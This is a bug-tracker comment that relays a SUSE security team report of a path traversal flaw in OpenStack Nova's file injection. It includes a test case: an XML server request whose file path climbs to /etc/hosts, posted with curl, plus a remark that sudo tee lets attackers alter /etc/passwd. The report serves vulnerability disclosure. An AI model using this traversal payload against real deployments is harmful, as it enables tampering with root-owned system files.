Comment 0 for bug 1015531

Revision history for this message
Thierry Carrez (ttx) wrote :

Mathias Weckbecker from SUSE Security Team reported the following:

During our internal security audit efforts at SUSE for openstack, I have found
an issue in openstack-nova (compute).

Quoting from [1] (comment #1):

Vulnerable code (quoted), /usr/lib64/python2.6/site-packages/nova/
[... snipped copy of utils.execute code ...]

It's already doing lots of things correctly, like e.g. calling Popen with
the first parameter being a list, still it is affected by traversal flaws.

Testcase (also from [1], comment #0):

mweckbecker@s3gfault:~$ cat newserver.xml
<?xml version="1.0" encoding="UTF-8"?>
<server xmlns=""
    <meta key="My Server Name">foobar</meta>
    <file path="../../../../../../../../../../../../../etc/hosts">

mweckbecker@s3gfault:~$ curl -v
-H"Content-type:application/xml" -H"Accept:application/xml" -d @newserver.xml

Additional note: This beast is calling tee with sudo, potentially allowing
attackers to even alter files such as /etc/passwd.


Thanks, Matthias